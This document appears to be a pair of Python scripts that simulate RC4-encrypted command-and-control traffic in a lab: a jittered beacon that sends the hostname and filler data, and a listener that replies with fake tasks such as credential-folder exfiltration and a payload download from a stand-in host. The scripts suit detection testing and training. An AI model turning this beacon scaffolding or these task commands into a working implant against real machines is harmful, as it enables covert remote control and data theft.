rc4 encryption
import socket
import time
import random
import string
from arc4 import ARC4
# Configuration
# (host, port) of the lab C2 listener this beacon connects to. The connection
# is a plain TCP socket: port 443 is only a number here, no TLS is involved.
C2_SERVER = ('172.31.255.29', 443) # Change to your lab C2 IP
# Shared RC4 key; the server script must use the identical bytes. RC4 provides
# no integrity protection, so a tampered response still "decrypts" to something.
KEY = b'APT38SecretKey2025!'
BEACON_INTERVAL = 30 # seconds between beacons (average)
JITTER = 0.4 # +/- 40% jitter
# Size range of the random filler appended to every beacon (see random_payload).
MIN_PAYLOAD = 200 # bytes
MAX_PAYLOAD = 8192 # bytes (simulates file exfil, screenshots, etc.)
def random_payload(min_size, max_size):
    """Return a random block of base64-looking filler bytes.

    The length is drawn uniformly from ``[min_size, max_size]`` and each
    byte from letters, digits, ``/`` and ``+``, so the plaintext resembles
    base64 output. The non-cryptographic ``random`` module is adequate:
    the bytes are simulated filler, not a secret.

    Args:
        min_size: smallest length in bytes (inclusive).
        max_size: largest length in bytes (inclusive).

    Returns:
        ``bytes`` of the chosen length (``b''`` when both bounds are 0).

    Raises:
        ValueError: propagated from ``random.randint`` when
            ``min_size > max_size``.
    """
    alphabet = string.ascii_letters + string.digits + '/+'
    length = random.randint(min_size, max_size)
    # All alphabet members are ASCII, so ord() yields the same bytes
    # as encoding the joined string would.
    return bytes(ord(ch) for ch in random.choices(alphabet, k=length))
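def _recv_until_close(sock, bufsize=65535):
    """Read from *sock* until the peer closes the connection.

    The lab C2 server writes its whole reply and then closes the socket, so
    EOF is the end-of-message marker. A single ``recv`` would return only
    the first TCP segment of a large tasking reply and the rest would be
    lost. There is no upper bound on the total size; the socket timeout set
    by the caller bounds how long each read may block.

    Args:
        sock: a connected socket.
        bufsize: maximum bytes requested per ``recv`` call.

    Returns:
        All bytes received before EOF, possibly ``b''``.

    Raises:
        OSError: propagated from ``recv`` (includes ``socket.timeout``).
    """
    chunks = []
    while True:
        chunk = sock.recv(bufsize)
        if not chunk:
            break
        chunks.append(chunk)
    return b''.join(chunks)


# Beacon loop: connect, send one encrypted beacon, read the tasking reply,
# then sleep a jittered interval. Runs until interrupted.
while True:
    try:
        # The context manager closes the socket on every path, including a
        # failed connect or a timeout, so no descriptor leaks per beacon.
        with socket.socket() as s:
            s.settimeout(10)
            s.connect(C2_SERVER)
            # Outbound beacon / staged exfil
            data_out = (
                f"BEACON|{socket.gethostname()}|DOMAIN.LOCAL|{random.randint(1000,9999)}|"
                + ''.join(random.choices(string.printable, k=random.randint(50,500)))
            )
            # Fresh cipher per beacon: the arc4 cipher object keeps its keystream
            # position across calls (the decrypt side below builds a new instance
            # for exactly this reason), so a shared module-level instance would
            # desynchronise from the server after the first beacon.
            encrypted_out = ARC4(KEY).encrypt(data_out.encode() + random_payload(MIN_PAYLOAD, MAX_PAYLOAD))
            # sendall() retries until every byte is written; send() may stop short.
            s.sendall(encrypted_out)
            # Receive and decrypt tasking (server may send large payload)
            response = _recv_until_close(s)
            if response:
                decrypted = ARC4(KEY).decrypt(response) # New ARC4 instance per-stream (correct RC4 behavior)
                print(f"[+] Received {len(response)} bytes → {decrypted[:200]}...")
    except Exception as e:
        # Best-effort: a failed beacon is logged and retried after the sleep.
        print(f"[-] Connection failed: {e}")
    # Jittered sleep
    sleep_time = BEACON_INTERVAL * random.uniform(1 - JITTER, 1 + JITTER)
    time.sleep(sleep_time)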
import socket
import random
import time
from arc4 import ARC4 # ← THIS WAS MISSING
# Must match the KEY in the implant script byte-for-byte; RC4 has no integrity
# check, so a mismatch shows up only as garbage plaintext, not as an error.
KEY = b'APT38SecretKey2025!'
# Address and port the listener binds; the implant's C2_SERVER must point here.
SERVER_IP = '172.31.255.29'
PORT = 443
# Simulated tasking strings; the accept loop picks one at random per
# connection and appends random filler bytes before encrypting.
tasks = [
b"TASK: Run whoami /all",
b"TASK: Screenshot",
b"TASK: Exfil %APPDATA%\\*",
b"TASK: Download http://c2.domain/payload.dll",
b"IDLE",
]
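# Listening socket for the lab C2 simulation. SO_REUSEADDR lets the server
# rebind immediately after a restart while old connections sit in TIME_WAIT.
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((SERVER_IP, PORT))
s.listen(50)
print(f"[*] High-volume RC4 C2 listening on {SERVER_IP}:{PORT}")

# Accept loop: one connection at a time, one beacon exchange per connection.
while True:
    try:
        client, addr = s.accept()
        # The context manager closes the client socket on every path, not
        # only the happy one. A per-connection timeout keeps a single stalled
        # implant from blocking this single-threaded server indefinitely.
        with client:
            client.settimeout(10)
            print(f"[+] Implant connected from {addr[0]}")
            # One recv only: the protocol has no length framing and the implant
            # keeps its write side open while waiting for a reply, so reading to
            # EOF here would deadlock. A beacon larger than one segment is truncated.
            data = client.recv(65535)
            if not data:
                continue
            # Fresh ARC4 instance per stream: the cipher object carries keystream state.
            decrypted = ARC4(KEY).decrypt(data)
            print(f"[+] Decrypted ({len(data)} bytes): {decrypted[:200]}...")
            # Simulate occasional large downlink (payloads, updates, etc.)
            task = random.choice(tasks)
            if random.random() < 0.15: # 15% chance of large payload
                fake_payload = random.randbytes(random.randint(50000, 300000)) # 50–300 KB
                response = task + b'||PAYLOAD||' + fake_payload
            else:
                response = task + random.randbytes(random.randint(100, 2000))
            encrypted_response = ARC4(KEY).encrypt(response)
            # sendall() is required: send() may write only part of a 300 KB
            # response and silently drop the remainder.
            client.sendall(encrypted_response)
    except Exception as e:
        # Best-effort: log and keep serving the next connection.
        print(f"[-] Error: {e}")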